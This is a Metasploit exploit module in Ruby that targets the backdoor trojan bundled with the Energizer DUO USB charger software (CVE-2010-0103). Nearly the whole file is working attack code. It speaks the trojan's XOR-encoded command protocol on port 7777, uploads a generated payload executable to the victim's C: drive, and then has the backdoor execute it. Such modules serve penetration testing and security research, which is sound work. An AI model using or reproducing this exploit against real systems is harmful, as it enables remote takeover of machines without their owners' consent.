##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Energizer DUO USB Battery Charger Arucer.dll Trojan Code Execution',
      'Description'    => %q{
          This module will execute an arbitrary payload against
        any system infected with the Arugizer trojan horse. This
        backdoor was shipped with the software package accompanying
        the Energizer DUO USB battery charger.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2010-0103'],
          ['OSVDB', '62782'],
          ['US-CERT-VU', '154421']
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 05 2010'
      ))


    register_options(
      [
        Opt::RPORT(7777),
      ])
  end

  def trojan_encode(str)
    str.unpack("C*").map{|c| c ^ 0xE5}.pack("C*")
  end

  def trojan_command(cmd)
    cid = ""

    case cmd
    when :exec
      cid = "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}"
    when :dir
      cid = "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}"
    when :write
      cid = "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}"
    when :read
      cid = "{F6C43E1A-1551-4000-A483-C361969AEC41}"
    when :nop
      cid = "{783EACBF-EF8B-498e-A059-F0B5BD12641E}"
    when :find
      cid = "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}"
    when :yes
      cid = "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}"
    when :runonce
      cid = "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}"
    when :delete
      cid = "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"
    end

    trojan_encode(
      [cid.length + 1].pack("V") + cid  + "\x00"
    )
  end

  def exploit

    nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00"
    exe = generate_payload_exe + "\x00"


    print_status("Trying to upload #{nam}...")
    connect

    # Write file request
    sock.put(trojan_command(:write))
    sock.put(trojan_encode([nam.length].pack("V")))
    sock.put(trojan_encode(nam))
    sock.put(trojan_encode([exe.length].pack("V")))
    sock.put(trojan_encode(exe))

    # Required to prevent the server from spinning a loop
    sock.put(trojan_command(:nop))

    disconnect

    #
    # Execute the payload
    #

    print_status("Trying to execute #{nam}...")

    connect

    # Execute file request
    sock.put(trojan_command(:exec))
    sock.put(trojan_encode([nam.length].pack("V")))
    sock.put(trojan_encode(nam))

    # Required to prevent the server from spinning a loop
    sock.put(trojan_command(:nop))

    disconnect
  end
end
